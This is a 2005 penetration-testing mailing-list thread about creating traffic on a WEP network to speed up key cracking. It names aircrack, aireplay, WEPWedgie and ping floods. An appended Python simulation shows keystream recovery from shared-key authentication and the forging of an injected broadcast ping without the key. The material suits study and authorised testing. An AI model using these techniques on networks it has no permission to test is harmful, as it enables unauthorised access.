Network Security Pen-Test

Re: Wireless Pentest Question

Subject: Re: Wireless Pentest Question
Date: Mon, 7 Feb 2005 12:00:42 -0500
Yes...

IP Address of gateway: Use Ettercap
Create Traffic- ICMP Ping Flood Tool
WEP Key being used: Aircrack or Snort

Hope that helps. Collecting enough WEP IVs in aircrack can take some
time; you will need approx. 200k-500k, depending on the amount of
traffic on the network, and that is where the ICMP ping flood tool
comes in. Aircrack will crack the WEP key in a few seconds; if you
tell it how long the WEP key is, it will do it faster, otherwise you
will need to wait a few more seconds.

-Brandon Kovacs


On Mon, 07 Feb 2005 07:06:22 -0500, Joshua Wright <jwright@hasborg.com> wrote:
Arvind,

Arvind Sood wrote:
The problem relates to creating traffic on a wireless network in case
you don't find a lot of traffic for a good capture. Is there any way
you can create traffic on a WEP network without knowing
- the IP address (address range) the access point and wireless clients
are using
- the WEP key being used (makes sense - that is why you are running a WEP
crack)

Besides aireplay (not sure why you are getting a SEGFAULT, it worked OK
for me - maybe check the Aircrack documentation?), you could use
WEPWedgie.  This tool was written by Anton Rager a few years ago, and
allows you to inject packets into the network after determining PRGA
from the WEP challenge/response mechanism.
http://www.sf.net/projects/wepwedgie/

The current version relies on the Airjack drivers for operation, meaning
you'll have to run it on a Linux 2.4 kernel system.  I wrote a small
patch to add an option to send ICMP echo requests to the broadcast
address (since you might not know any internal addresses), which is
available at http://home.jwu.edu/jwright/code/ww-broadcasticmp.diff.

Unfortunately, Airjack has some timing issues which makes it somewhat
ineffective for injecting large quantities of packets, but this will get
you started.  While at Shmoocon (you guys rock!) I started re-writing
WEPWedgie to port it to a more reliable packet injection framework (and
code cleanup) for another project; I'll make that available when I get
it finished.

Good luck,

-Josh
--
-Joshua Wright
jwright@hasborg.com
http://home.jwu.edu/jwright/

pgpkey: http://home.jwu.edu/jwright/pgpkey.htm
fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73

Today I stumbled across the world's largest hotspot.  The SSID is "linksys".



-- 
-Brandon
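The keystream-recovery trick Josh describes for WEPWedgie (learn the RC4 PRGA output for one IV from the shared-key authentication challenge/response, then reuse that IV to inject frames such as an ICMP echo request to the broadcast address without ever knowing the key) can be shown end to end in a small simulation. The block below is an added example for this thread; it is not code from the original posts, from WEPWedgie or from aircrack. The key, IV and 128-byte challenge are constructed values, and the frames are simplified: the 802.11 header, the key-ID byte after the IV and the LLC/SNAP header are omitted, so only the IV || RC4(IV || key)-encrypted body with its CRC-32 ICV is modelled.

```python
"""Simulated WEP shared-key auth keystream recovery and frame forgery.

Added example; not part of the original thread or of WEPWedgie.
WEP facts used: RC4 keyed with IV(3 bytes) || key, CRC-32 ICV appended
to the plaintext before encryption, 128-byte shared-key challenge.
"""
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA); returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC-32 of the plaintext."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as sent on the air (key-ID byte omitted): IV || RC4(plain || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Decrypt with the real key (what the AP does); returns (plaintext, icv_ok)."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4_keystream(iv + key, len(ct)))
    pt, tag = body[:-4], body[-4:]
    return pt, tag == icv(pt)


def recover_keystream(challenge: bytes, response_frame: bytes):
    """Attacker side: the challenge is sent in clear, the response encrypts
    challenge || ICV, so XORing the two yields the PRGA output for that IV."""
    iv = response_frame[:3]
    known_plain = challenge + icv(challenge)
    return iv, xor(response_frame[3:], known_plain)


def forge_frame(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Encrypt an arbitrary payload under the recovered keystream, no key needed."""
    body = plaintext + icv(plaintext)
    if len(body) > len(keystream):
        raise ValueError("payload longer than recovered keystream")
    return iv + xor(body, keystream[: len(body)])


def inet_checksum(data: bytes) -> int:
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def icmp_echo_to_broadcast(src: str = "0.0.0.0", ident: int = 1, seq: int = 1) -> bytes:
    """IPv4 + ICMP echo request to 255.255.255.255; the source is a placeholder
    since, as Josh notes, the injector may not know any internal address."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + b"ping"
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     bytes(int(o) for o in src.split(".")), b"\xff\xff\xff\xff")
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + icmp


def demo() -> bool:
    """Run the whole exchange; True if the AP accepts the forged frame."""
    key = b"\x01\x02\x03\x04\x05"      # constructed 40-bit key, never given to the attacker
    iv = b"\x0a\x0b\x0c"               # IV the client picks for its auth response
    challenge = bytes(range(128))      # constructed 128-byte challenge, seen in clear
    response = wep_encrypt(key, iv, challenge)   # client's shared-key auth response
    iv_r, keystream = recover_keystream(challenge, response)
    forged = forge_frame(iv_r, keystream, icmp_echo_to_broadcast())
    plaintext, ok = wep_decrypt(key, forged)
    return ok and plaintext == icmp_echo_to_broadcast()


if __name__ == "__main__":
    print("forged broadcast ping accepted:", demo())
```

The recovered keystream is only as long as the challenge plus ICV (132 bytes), which is why WEPWedgie's injected frames are short; every frame forged this way reuses one IV, so each reply the network sends back carries a fresh IV of its own, which is what feeds aircrack. Any later tampering with the ciphertext breaks the CRC-32 ICV on decryption, which the `wep_decrypt` check models.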
